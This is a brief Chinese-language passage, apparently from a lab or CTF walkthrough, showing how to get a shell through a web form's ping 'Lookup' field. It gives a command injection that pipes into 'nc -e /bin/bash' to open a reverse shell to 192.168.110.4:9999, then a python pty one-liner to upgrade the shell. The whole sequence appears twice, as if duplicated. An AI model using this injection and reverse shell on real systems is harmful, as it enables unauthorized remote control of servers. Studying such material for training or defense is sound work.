在网页框中输入
ping 192.168.110.4| nc -e /bin/bash 192.168.110.4 9999
然后点击Lookup
可以看到我们已经拿到shell
python -c ‘import pty;pty.spawn("/bin/bash")’
开启一个python终端
在网页框中输入
ping 192.168.110.4| nc -e /bin/bash 192.168.110.4 9999
然后点击Lookup
可以看到我们已经拿到shell
python -c ‘import pty;pty.spawn("/bin/bash")’
开启一个python终端
Copyright © 2018 - 2021 www.yd166.com., All Rights Reserved.